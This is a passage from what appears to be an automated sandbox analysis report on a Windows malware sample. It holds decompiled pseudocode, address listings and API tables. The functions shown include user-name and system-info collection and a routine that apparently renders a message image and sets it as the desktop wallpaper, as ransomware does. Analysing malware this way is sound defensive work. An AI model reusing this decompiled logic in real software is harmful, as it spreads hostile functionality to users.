												goto L39;
											}
											if(_t397 == 0) {
												_t676 = _v24;
												 *(_t664 + _t676) = _t624 >> 0x0000000c | 0x000000e0;
												 *(_t664 + _t676 + 1) = _t624 >> 0x00000006 & 0x0000003f | 0x00000080;
												 *(_t664 + _t676 + 2) = _t624 & 0x0000003f | 0x00000080;
												_t664 = _t664 + 3;
												goto L44;
											} else {
												_t664 = _t664 + 3;
												goto L39;
											}
										}
										if(_t397 == 0) {
											_t677 = _v24;
											 *(_t664 + _t677) = _t624 >> 0x00000006 | 0x000000c0;
											 *(_t664 + _t677 + 1) = _t624 & 0x0000003f | 0x00000080;
											_t664 = _t664 + 2;
											goto L44;
										} else {
											_t664 = _t664 + 2;
											goto L39;
										}
									} else {
										if(_t397 == 0) {
											 *(_t664 + _v24) = _t624;
										}
										_t664 = _t664 + 1;
										L39:
										_t669 = _v16;
										_a12 = _t664;
										goto L242;
									}
								}
								if(_v32 - _t567 <= 6) {
									goto L247;
								}
								_t582 =  &(_t567[1]);
								_v76 = _t582;
								if( *_t582 != 0x5c) {
									goto L247;
								}
								_t583 =  &(_t582[1]);
								_v76 = _t583;
								if( *_t583 != 0x75) {
									goto L247;
								}
								_t584 =  &(_t583[1]);
								_v76 = _t584;
								if(E009BB716( *_t584 & 0x000000ff) == 0xff) {
									goto L247;
								}
								_t585 =  &(_t584[1]);
								_v76 = _t585;
								_t519 = E009BB716( *_t585 & 0x000000ff);
								_a11 = _t519;
								if(_t519 == 0xff) {
									goto L247;
								}
								_t586 =  &(_t585[1]);
								_v76 = _t586;
								_t520 = E009BB716( *_t586 & 0x000000ff);
								_a15 = _t520;
								if(_t520 == 0xff) {
									goto L247;
								}
								_t567 =  &(_t586[1]);
								_v76 = _t567;
								_t521 = E009BB716( *_t567 & 0x000000ff);
								_a7 = _t521;
								if(_t521 == 0xff) {
									goto L247;
								} else {
									_t683 = (_v44 & 0x000003bf | 0x00000040) << 0x00000002 | _a11 & 3;
									_v44 = _t683;
									_t624 = _t683 << 0x00000008 | _a15 << 0x00000004 & 0x000000ff | _a7 & 0x000000ff;
									goto L35;
								}
							} else {
								_t397 = _v80;
								goto L84;
							}
						}
					}
				}
			}


























































































































            0x009bb7b4
            0x009bb7b7
            0x009bb7bc
            0x009bb7bf
            0x009bb7c2
            0x009bb7c5
            0x009bb7c8
            0x009bb7cb
            0x009bb7ce
            0x009bb7d1
            0x009bb7d7
            0x009bb7ea
            0x009bb7ed
            0x009bb7f0
            0x009bb7f0
            0x009bb7f9
            0x009bb801
            0x009bb809
            0x009bb80a
            0x009bb80a
            0x009bb80c
            0x009bb812
            0x009bb816
            0x009bb81c
            0x009bb81f
            0x009bb81f
            0x009bb81f
            0x009bb823
            0x009bb825
            0x009bb828
            0x009bb82c
            0x009bb82d
            0x009bb830
            0x009bb833
            0x009bb836
            0x009bb839
            0x009bb840
            0x009bb840
            0x009bb846
            0x009bb84c
            0x009bb848
            0x009bb848
            0x009bb848
            0x009bb84e
            0x009bb84e
            0x009bb854
            0x009bbb93
            0x009bbb97
            0x009bbcb6
            0x009bbcb8
            0x009bbcfb
            0x009bc046
            0x009bc046
            0x009bc049
            0x009bc04b
            0x009bc051
            0x009bc28c
            0x009bc28e
            0x009bc291
            0x009bc384
            0x009bc384
            0x009bc387
            0x009bc387
            0x009bc38a
            0x009bc38a
            0x009bc390
            0x009bb840
            0x009bb846
            0x009bb84c
            0x009bb848
            0x009bb848
            0x009bb848
            0x00000000
            0x009bb84c
            0x009bc297
            0x009bc29a
            0x009bc37d
            0x009bc380
            0x00000000
            0x009bc380
            0x009bc2a0
            0x009bc2a3
            0x00000000
            0x00000000
            0x009bc2a9
            0x009bc2ac
            0x00000000
            0x00000000
            0x009bc2b3
            0x009bc2b6
            0x009bc2e2
            0x009bc3b3
            0x009bc3b3
            0x009bc3bb
            0x009bc3c1
            0x009bc3d1
            0x009bc3d3
            0x009bc3dc
            0x009bc3e2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bc3c3
            0x009bc3c3
            0x009bc3c3
            0x009bc3c7
            0x009bc3ca
            0x009bc3cd
            0x00000000
            0x009bc3c3
            0x009bc2e8
            0x009bc2eb
            0x009bc2ee
            0x009bc2f0
            0x009bc2f3
            0x009bc2f9
            0x009bc303
            0x009bc306
            0x009bc308
            0x009bc30b
            0x009bc30c
            0x009bc30f
            0x009bc30f
            0x009bc315
            0x009bc317
            0x009bc31c
            0x009bc31f
            0x009bc323
            0x009bc337
            0x009bc33e
            0x009bc341
            0x009bc346
            0x009bc349
            0x009bc362
            0x009bc34b
            0x009bc34e
            0x009bc356
            0x009bc356
            0x009bc34e
            0x009bc349
            0x009bc366
            0x009bc368
            0x009bc371
            0x00000000
            0x009bc373
            0x009bc373
            0x009bc375
            0x009bc378
            0x00000000
            0x009bc378
            0x009bc371
            0x009bc325
            0x009bbc08
            0x009bbc08
            0x009bbc08
            0x00000000
            0x009bc315
            0x009bc2b8
            0x009bc2bb
            0x009bc2d4
            0x00000000
            0x00000000
            0x009bc2da
            0x009bc2cc
            0x009bc2cc
            0x009bc300
            0x009bc300
            0x00000000
            0x009bc300
            0x009bc2c0
            0x00000000
            0x00000000
            0x009bc2c9
            0x00000000
            0x009bc2c9
            0x009bc057
            0x009bc05d
            0x009bc2fe
            0x00000000
            0x009bc2fe
            0x009bc069
            0x009bc134
            0x009bc178
            0x00000000
            0x00000000
            0x009bc17c
            0x009bc18e
            0x009bc191
            0x00000000
            0x009bc13b
            0x009bc13e
            0x009bc199
            0x009bc19f
            0x009bc224
            0x009bc3b1
            0x009bc3b1
            0x00000000
            0x009bc3b1
            0x009bc22a
            0x009bc22f
            0x009bc237
            0x009bc23d
            0x009bc240
            0x009bc245
            0x009bc248
            0x009bc24b
            0x009bc251
            0x009bc254
            0x009bc25a
            0x009bc262
            0x009bc27c
            0x009bc264
            0x009bc26c
            0x009bc26f
            0x009bc274
            0x009bc274
            0x009bc262
            0x009bc281
            0x009bc284
            0x009bc284
            0x00000000
            0x009bc284
            0x009bc1a4
            0x009bc1e8
            0x009bc1eb
            0x009bc1ed
            0x009bc1f0
            0x009bc1f7
            0x009bc1fa
            0x009bc203
            0x009bc205
            0x009bc20b
            0x009bc20e
            0x009bc20e
            0x009bc211
            0x009bc215
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bc1f0
            0x009bc1a6
            0x009bc1ab
            0x00000000
            0x00000000
            0x009bc1b1
            0x009bc1b7
            0x009bc1ba
            0x009bc1bd
            0x009bc1c0
            0x009bc1c3
            0x009bc1c8
            0x009bc1cb
            0x009bc1ce
            0x009bc1d1
            0x009bc1d4
            0x009bc1d7
            0x009bc1da
            0x009bc1dd
            0x009bc1e0
            0x009bc1e3
            0x00000000
            0x009bc145
            0x009bc149
            0x009bc14b
            0x00000000
            0x00000000
            0x009bc154
            0x009bc157
            0x009bc15b
            0x009bc161
            0x009bc164
            0x00000000
            0x009bc164
            0x009bc13e
            0x009bc134
            0x009bc072
            0x009bc074
            0x009bc075
            0x009bc07b
            0x009bc0be
            0x009bc113
            0x009bc117
            0x009bc124
            0x009bc129
            0x00000000
            0x009bc129
            0x009bc0c7
            0x00000000
            0x00000000
            0x009bc0d0
            0x009bc0d7
            0x009bc0d9
            0x009bc0d9
            0x009bc0e2
            0x009bc0e5
            0x009bc0f4
            0x009bc0fb
            0x009bc0fe
            0x009bc100
            0x009bc103
            0x009bc106
            0x009bc108
            0x009bc10b
            0x00000000
            0x009bc10b
            0x009bc083
            0x00000000
            0x00000000
            0x009bc099
            0x009bc09c
            0x009bc0a5
            0x009bc0a8
            0x009bc0aa
            0x009bc0ad
            0x009bc0b0
            0x00000000
            0x009bc0b0
            0x009bbd04
            0x009bbd06
            0x009bbd09
            0x00000000
            0x00000000
            0x009bbd0f
            0x009bbd12
            0x009bbcec
            0x009bbcec
            0x009bbcef
            0x00000000
            0x009bbcef
            0x009bbd14
            0x009bbd17
            0x00000000
            0x00000000
            0x009bbd1d
            0x009bbd20
            0x00000000
            0x00000000
            0x009bbd29
            0x009bc02b
            0x00000000
            0x009bc03b
            0x009bc03e
            0x00000000
            0x009bc03e
            0x009bc02b
            0x009bbd32
            0x009bbd48
            0x009bbd5e
            0x009bbd64
            0x009bbff7
            0x009bbffc
            0x009bc001
            0x00000000
            0x00000000
            0x009bc007
            0x009bc00d
            0x009bc010
            0x009bc013
            0x009bc015
            0x009bc01b
            0x009bc01e
            0x009bc021
            0x00000000
            0x009bc021
            0x009bbd6d
            0x009bbfbe
            0x009bbfc3
            0x009bbfc8
            0x00000000
            0x00000000
            0x009bbfd1
            0x009bbfd4
            0x009bbfd7
            0x009bbfda
            0x009bbfdd
            0x00000000
            0x009bbfdd
            0x009bbd76
            0x009bbf39
            0x00000000
            0x00000000
            0x009bbf3f
            0x009bbf40
            0x009bbf46
            0x00000000
            0x00000000
            0x009bbf4c
            0x009bbf4d
            0x009bbf53
            0x00000000
            0x00000000
            0x009bbf59
            0x009bbf5a
            0x009bbf60
            0x00000000
            0x00000000
            0x009bbf66
            0x009bbf67
            0x009bbf6d
            0x00000000
            0x00000000
            0x009bbf73
            0x009bbf75
            0x009bbf78
            0x009bbf7c
            0x009bbf80
            0x009bbf84
            0x009bbf85
            0x009bbf8a
            0x009bbf8f
            0x00000000
            0x00000000
            0x009bbf98
            0x009bbf9b
            0x009bbf9e
            0x009bbfa1
            0x009bbfa4
            0x00000000
            0x009bbfa4
            0x009bbd7f
            0x009bbf00
            0x00000000
            0x00000000
            0x009bbf06
            0x009bbf07
            0x009bbf0d
            0x00000000
            0x00000000
            0x009bbf13
            0x009bbf14
            0x009bbf1a
            0x00000000
            0x00000000
            0x009bbf20
            0x009bbf21
            0x009bbf27
            0x00000000
            0x00000000
            0x009bbf2d
            0x00000000
            0x009bbf2d
            0x009bbd88
            0x009bbe8d
            0x00000000
            0x00000000
            0x009bbe93
            0x009bbe94
            0x009bbe9a
            0x00000000
            0x00000000
            0x009bbea0
            0x009bbea1
            0x009bbea7
            0x00000000
            0x00000000
            0x009bbead
            0x009bbeae
            0x009bbeb4
            0x00000000
            0x00000000
            0x009bbecc
            0x009bbed1
            0x009bbed6
            0x00000000
            0x00000000
            0x009bbedc
            0x009bbee5
            0x009bbee8
            0x009bbeea
            0x009bbeed
            0x009bbef0
            0x00000000
            0x009bbef0
            0x009bbd91
            0x009bbe64
            0x009bbe69
            0x009bbe6e
            0x00000000
            0x00000000
            0x009bbe74
            0x009bbe77
            0x009bbe7a
            0x009bbe7d
            0x00000000
            0x009bbe7d
            0x009bbd9a
            0x009bbda4
            0x00000000
            0x00000000
            0x00000000
            0x009bbdaa
            0x009bbdaa
            0x009bbdbc
            0x009bbdc1
            0x009bbdc6
            0x00000000
            0x00000000
            0x009bbdd0
            0x009bbdd3
            0x009bbe1d
            0x009bbe21
            0x009bbe27
            0x009bbe2b
            0x009bbe2f
            0x009bbe37
            0x009bbe3a
            0x009bbe3d
            0x009bbe47
            0x00000000
            0x009bbe47
            0x009bbe3f
            0x00000000
            0x009bbe3f
            0x009bbdd5
            0x009bbdd8
            0x00000000
            0x009bbddb
            0x009bbddd
            0x009bbde5
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bbdf7
            0x009bbdf7
            0x009bbdf7
            0x009bbdf8
            0x009bbdfd
            0x009bbe03
            0x009bbe06
            0x009bbe09
            0x009bbe0c
            0x009bbe0f
            0x009bbe12
            0x00000000
            0x009bbe12
            0x009bbdff
            0x00000000
            0x009bbdff
            0x009bbddd
            0x009bbddb
            0x009bbd9a
            0x009bbd4d
            0x00000000
            0x00000000
            0x009bbd53
            0x00000000
            0x009bbd53
            0x009bbd37
            0x00000000
            0x00000000
            0x009bbd3d
            0x00000000
            0x009bbd3d
            0x009bbcbc
            0x009bc396
            0x009bc396
            0x009bc39a
            0x009bc39d
            0x009bc3a0
            0x009bc3ad
            0x00000000
            0x009bc3ad
            0x009bc3a2
            0x009bc3a5
            0x00000000
            0x009bc3a5
            0x009bbcc5
            0x009bbcc7
            0x009bbcca
            0x00000000
            0x00000000
            0x009bbcd0
            0x009bbcd3
            0x00000000
            0x00000000
            0x009bbcd5
            0x009bbcd8
            0x00000000
            0x00000000
            0x009bbce1
            0x00000000
            0x00000000
            0x00000000
            0x009bbce7
            0x009bbba3
            0x009bbc72
            0x00000000
            0x00000000
            0x009bbc74
            0x009bbc79
            0x009bbc85
            0x009bbc86
            0x009bbc8c
            0x00000000
            0x00000000
            0x009bbc92
            0x009bbc96
            0x009bbcab
            0x00000000
            0x009bbcab
            0x009bbc9a
            0x00000000
            0x00000000
            0x009bbca0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009bbc79
            0x009bbbaf
            0x009bbc2e
            0x00000000
            0x00000000
            0x009bbc34
            0x009bbc38
            0x00000000
            0x00000000
            0x009bbc41
            0x00000000
            0x00000000
            0x009bbc4d
            0x00000000
            0x00000000
            0x009bbc57
            0x009bbc5a
            0x009bbc60
            0x009bbc66
            0x009bbc67
            0x009bbc67
            0x00000000
            0x009bbc5a
            0x009bbbb1
            0x009bbbb6
            0x009bbbc5
            0x009bbbcb
            0x009bbbcc
            0x009bbbcc
            0x00000000
            0x009bbbb6
            0x009bb85c
            0x00000000
            0x009bb86b
            0x009bb86e
            0x009bbb4d
            0x009bbb5f
            0x009bbc10
            0x009bbc12
            0x009bbc14
            0x009bbc1d
            0x009bbc20
            0x009bbc20
            0x009bbb41
            0x009bbb41
            0x009bbb42
            0x00000000
            0x009bbb42
            0x009bbb67
            0x009bbb6c
            0x009bbb6c
            0x009bbb73
            0x009bbb76
            0x009bbb7a
            0x009bbb7d
            0x009bbb80
            0x009bbbd8
            0x009bbbda
            0x009bbbee
            0x009bbbf8
            0x009bbbfb
            0x009bbbff
            0x009bbc02
            0x009bbbdc
            0x009bbbdc
            0x009bbbdf
            0x009bbbdf
            0x009bbc05
            0x00000000
            0x009bbb82
            0x009bbb85
            0x009bbb88
            0x009bbb8a
            0x009bbb8d
            0x009bbb90
            0x009bbb90
            0x00000000
            0x009bbb88
            0x009bbb80
            0x009bbb4f
            0x009bbb52
            0x009bbb54
            0x00000000
            0x009bbb54
            0x009bb874
            0x009bb87a
            0x009bb87d
            0x009bb87f
            0x009bb882
            0x009bbb33
            0x009bbb38
            0x009bbb3d
            0x009bbb3d
            0x00000000
            0x009bbb38
            0x009bb888
            0x009bb88b
            0x009bbb23
            0x009bbb28
            0x009bbb2d
            0x009bbb2d
            0x00000000
            0x009bbb28
            0x009bb891
            0x009bb894
            0x009bbb13
            0x009bbb18
            0x009bbb1d
            0x009bbb1d
            0x00000000
            0x009bbb18
            0x009bb89a
            0x009bb89d
            0x009bbb03
            0x009bbb08
            0x009bbb0d
            0x009bbb0d
            0x00000000
            0x009bbb08
            0x009bb8a4
            0x009bb8a7
            0x009bbaf3
            0x009bbaf8
            0x009bbafd
            0x009bbafd
            0x00000000
            0x009bbaf8
            0x009bb8b0
            0x009bb8c2
            0x00000000
            0x00000000
            0x009bb8c8
            0x009bb8c9
            0x009bb8d0
            0x009bb8d5
            0x009bb8db
            0x00000000
            0x00000000
            0x009bb8e1
            0x009bb8e2
            0x009bb8e9
            0x009bb8ee
            0x009bb8f4
            0x00000000
            0x00000000
            0x009bb8fa
            0x009bb8fb
            0x009bb902
            0x009bb907
            0x009bb90d
            0x00000000
            0x00000000
            0x009bb913
            0x009bb914
            0x009bb91b
            0x009bb920
            0x009bb926
            0x00000000
            0x00000000
            0x009bb93c
            0x009bb94b
            0x009bb952
            0x009bb956
            0x009bb963
            0x009bba23
            0x009bba23
            0x009bba29
            0x009bba47
            0x009bba7a
            0x009bbab0
            0x009bbaba
            0x009bbac4
            0x009bbad0
            0x009bbae3
            0x009bbae7
            0x009bbaeb
            0x009bba6c
            0x009bba6c
            0x00000000
            0x009bba6c
            0x009bbab2
            0x00000000
            0x009bbab2
            0x009bba7e
            0x009bba85
            0x009bba8f
            0x009bbaa1
            0x009bbaa5
            0x009bbaa9
            0x00000000
            0x009bba80
            0x009bba80
            0x00000000
            0x009bba80
            0x009bba7e
            0x009bba4b
            0x009bba52
            0x009bba62
            0x009bba65
            0x009bba69
            0x00000000
            0x009bba4d
            0x009bba4d
            0x00000000
            0x009bba4d
            0x009bba2b
            0x009bba2d
            0x009bba32
            0x009bba32
            0x009bba35
            0x009bba36
            0x009bba36
            0x009bba39
            0x00000000
            0x009bba39
            0x009bba29
            0x009bb971
            0x00000000
            0x00000000
            0x009bb977
            0x009bb978
            0x009bb97e
            0x00000000
            0x00000000
            0x009bb984
            0x009bb985
            0x009bb98b
            0x00000000
            0x00000000
            0x009bb991
            0x009bb992
            0x009bb9a1
            0x00000000
            0x00000000
            0x009bb9a7
            0x009bb9a8
            0x009bb9af
            0x009bb9b4
            0x009bb9ba
            0x00000000
            0x00000000
            0x009bb9c0
            0x009bb9c1
            0x009bb9c8
            0x009bb9cd
            0x009bb9d3
            0x00000000
            0x00000000
            0x009bb9d9
            0x009bb9da
            0x009bb9e1
            0x009bb9e6
            0x009bb9ec
            0x00000000
            0x009bb9f2
            0x009bba0b
            0x009bba1a
            0x009bba21
            0x00000000
            0x009bba21
            0x009bb8b2
            0x009bb8b2
            0x00000000
            0x009bb8b2
            0x009bb8b0
            0x009bb85c
            0x009bb840

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 08156435448e5f749d309a5ccb23b42de6a213d0f6e87e6ec814c0abee2cb9d4
            • Instruction ID: 1140031496a09659d0336977deb507ecbb8e5d5324d505a5d12f073bc7c61239
            • Opcode Fuzzy Hash: 08156435448e5f749d309a5ccb23b42de6a213d0f6e87e6ec814c0abee2cb9d4
            • Instruction Fuzzy Hash: 4782FEB1D002198FDF24CFA8CA817EEBBF9FF45320F68815AE491A7296D7749941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5126, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B5126() {
				long _v8;
				WCHAR* _t3;
				int _t5;
				WCHAR* _t11;

				_t3 = E009B494C(0x202);
				_t11 = _t3;
				if(_t11 != 0) {
					_v8 = 0x101;
					_t5 = GetUserNameW(_t11,  &_v8); // executed
					if(_t5 == 0) {
						E009B4999(_t11);
						_t11 = 0;
					}
					_t3 = _t11;
				}
				return _t3;
			}







            0x009b5130
            0x009b5135
            0x009b513a
            0x009b513f
            0x009b5148
            0x009b5150
            0x009b5153
            0x009b5159
            0x009b5159
            0x009b515b
            0x009b515b
            0x009b5161

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • GetUserNameW.ADVAPI32(00000000,009B198A), ref: 009B5148
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Heap$CreateNameProcessUser
            • String ID:
            • API String ID: 499767188-0
            • Opcode ID: 6141771f7fec4b44d5188b2c1f93e44065e87d5e9cb7b0b2ccb515062aa04ace
            • Instruction ID: e20dea01ab9baf71b7b4f01aa6eebb302b301b130112ac162357b5a7b87f83f4
            • Opcode Fuzzy Hash: 6141771f7fec4b44d5188b2c1f93e44065e87d5e9cb7b0b2ccb515062aa04ace
            • Instruction Fuzzy Hash: 38E0CD72A156347B9624D7D8AD09BEFB79CCF02B70B11015AFD04D3342E7A08E0052E5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B53F1, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B53F1() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




            0x009b53fb
            0x009b5407

            APIs
            • GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 5efc24916ee7defb7e74d735080cc3c7d7198243687745be2c1bb854debff18e
            • Instruction ID: da66d65658efa77b86b35b9bbac0e9f1c8e82ebbc7198726a4613a52b3795762
            • Opcode Fuzzy Hash: 5efc24916ee7defb7e74d735080cc3c7d7198243687745be2c1bb854debff18e
            • Instruction Fuzzy Hash: 71C04C79D0820C978B00EAE5994989AB7BCA60A501B400591ED1993201E635E95487A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B46DE, Relevance: 31.7, APIs: 21, Instructions: 202windowCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 91%
            			E009B46DE() {
				signed int _v8;
				int _v12;
				signed int _v16;
				struct HDC__* _v20;
				void* _v24;
				int _v28;
				struct HDC__* _v32;
				int _v36;
				void* _v40;
				struct tagRECT _v56;
				struct HDC__* _t56;
				struct HDC__* _t57;
				int _t59;
				int _t60;
				int _t61;
				void* _t62;
				int _t67;
				void* _t68;
				struct HBRUSH__* _t73;
				signed int _t77;
				int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				struct HDC__* _t101;
				struct HDC__* _t102;
				signed int _t104;
				signed int _t111;
				signed int _t112;
				signed char _t114;
				int _t121;
				void* _t123;
				struct HDC__* _t128;
				int _t132;
				int _t133;
				void* _t134;

				_t56 = GetDC(0);
				_t101 = _t56;
				_v32 = _t101;
				if(_t101 != 0) {
					_t57 = CreateCompatibleDC(_t101); // executed
					_t128 = _t57;
					_v20 = _t128;
					if(_t128 == 0) {
						L17:
						return ReleaseDC(0, _t101);
					}
					_t59 = GetDeviceCaps(_t101, 8);
					_t121 = _t59;
					_t60 = 0xa;
					_v28 = _t121;
					_v16 = _t60;
					_t61 = GetDeviceCaps(_t101, _t60);
					_v8 = _t61;
					_t62 = CreateCompatibleBitmap(_t101, _t121, _t61); // executed
					_v24 = _t62;
					if(_t62 == 0) {
						L16:
						DeleteDC(_t128);
						goto L17;
					}
					SelectObject(_t128, _t62);
					_t67 =  ~(MulDiv(0x12, GetDeviceCaps(_t101, 0x5a), 0x48));
					_v36 = _t67;
					_t68 = CreateFontW(_t67, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, 0);
					_v40 = _t68;
					if(_t68 == 0) {
						L15:
						DeleteObject(_v24);
						goto L16;
					}
					SelectObject(_t128, _t68);
					SetBkMode(_t128, 1);
					SetTextColor(_t128, 0xffffff);
					_t73 = GetStockObject(2);
					_v56.left = _v56.left & 0x00000000;
					_v56.top = _v56.top & 0x00000000;
					_v56.right = _t121;
					_v56.bottom = _v8;
					FillRect(_t128,  &_v56, _t73);
					_t104 = _v8;
					_t77 = _t104 * _t121;
					asm("cdq");
					_t114 = _t77 % _v16;
					if(_t77 / _v16 <= 0) {
						L12:
						asm("cdq");
						asm("cdq");
						_v56.top = (_v56.bottom - _t114 >> 1) - (_v8 - _t114 >> 1) - _v36;
						DrawTextW(_t128,  *0x9c2264, 0xffffffff,  &_v56, 0x11); // executed
						_t123 = E009B45D9(_t114, _t144);
						if(_t123 != 0) {
							E009B4424(_t114, _v24, _t101, _t123); // executed
							 *0x9c1060(0x14, 0, _t123, 3); // executed
							E009B4999(_t123);
						}
						DeleteObject(_v40);
						goto L15;
					}
					_t91 = 0;
					_v12 = 0;
					if(_t121 <= 0) {
						goto L12;
					}
					_t102 = _t128;
					do {
						_v16 = _v16 & 0x00000000;
						if(_t104 <= 0) {
							goto L10;
						} else {
							goto L8;
						}
						do {
							L8:
							_t92 = E009B54CC(_t114, 0, 0xffffffff);
							_t94 = E009B54CC(_t92 % 0xc8, 0, 0xffffffff);
							_t111 = 0x1e;
							_t96 = E009B54CC(_t94 % _t111, 0, 0xffffffff);
							_t134 = _t134 + 0x18;
							_t132 = _v16;
							_t112 = 0x1e;
							_t114 = _t96 % _t112;
							SetPixel(_t102, _v12, _t132, _t114 & 0x000000ff | (_t94 % _t111 & 0x000000ff | (_t92 % 0x000000c8 & 0x000000ff) << 0x00000008) << 0x00000008); // executed
							_t104 = _v8;
							_t133 = _t132 + 1;
							_v16 = _t133;
						} while (_t133 < _t104);
						_t121 = _v28;
						_t91 = _v12;
						L10:
						_t91 = _t91 + 1;
						_v12 = _t91;
						_t144 = _t91 - _t121;
					} while (_t91 < _t121);
					_t101 = _v32;
					_t128 = _v20;
					goto L12;
				}
				return _t56;
			}







































            0x009b46e7
            0x009b46ed
            0x009b46ef
            0x009b46f4
            0x009b46fc
            0x009b4702
            0x009b4704
            0x009b4709
            0x009b48df
            0x00000000
            0x009b48e8
            0x009b4713
            0x009b471b
            0x009b471d
            0x009b4720
            0x009b4723
            0x009b4726
            0x009b472f
            0x009b4732
            0x009b4738
            0x009b473d
            0x009b48d7
            0x009b48d8
            0x00000000
            0x009b48de
            0x009b4745
            0x009b4761
            0x009b4773
            0x009b4776
            0x009b477c
            0x009b4781
            0x009b48ce
            0x009b48d1
            0x00000000
            0x009b48d1
            0x009b4789
            0x009b4792
            0x009b479e
            0x009b47a6
            0x009b47af
            0x009b47b3
            0x009b47bb
            0x009b47c0
            0x009b47c3
            0x009b47c9
            0x009b47ce
            0x009b47d1
            0x009b47d2
            0x009b47d7
            0x009b486a
            0x009b486d
            0x009b4875
            0x009b488f
            0x009b4893
            0x009b489e
            0x009b48a2
            0x009b48a9
            0x009b48b8
            0x009b48bf
            0x009b48c4
            0x009b48c8
            0x00000000
            0x009b48c8
            0x009b47dd
            0x009b47df
            0x009b47e4
            0x00000000
            0x00000000
            0x009b47ea
            0x009b47ec
            0x009b47ec
            0x009b47f2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b47f4
            0x009b47f4
            0x009b47f8
            0x009b4810
            0x009b4817
            0x009b4828
            0x009b482d
            0x009b4830
            0x009b4837
            0x009b4838
            0x009b4845
            0x009b484b
            0x009b484e
            0x009b484f
            0x009b4852
            0x009b4856
            0x009b4859
            0x009b485c
            0x009b485c
            0x009b485d
            0x009b4860
            0x009b4860
            0x009b4864
            0x009b4867
            0x00000000
            0x009b4867
            0x009b48ed

            APIs
            • GetDC.USER32(00000000), ref: 009B46E7
            • CreateCompatibleDC.GDI32(00000000), ref: 009B46FC
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 009B4713
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009B4726
            • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 009B4732
            • SelectObject.GDI32(00000000,00000000), ref: 009B4745
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B474E
            • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 009B4759
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 009B4776
            • SelectObject.GDI32(00000000,00000000), ref: 009B4789
            • SetBkMode.GDI32(00000000,00000001), ref: 009B4792
            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 009B479E
            • GetStockObject.GDI32(00000002), ref: 009B47A6
            • FillRect.USER32(00000000,00000000,00000000), ref: 009B47C3
            • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 009B4845
            • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 009B4893
            • KiUserCallbackDispatcher.NTDLL(00000014,00000000,00000000,00000003), ref: 009B48B8
            • DeleteObject.GDI32(?), ref: 009B48C8
            • DeleteObject.GDI32(?), ref: 009B48D1
            • DeleteDC.GDI32(00000000), ref: 009B48D8
            • ReleaseDC.USER32(00000000,00000000), ref: 009B48E2
            Memory Dump Source
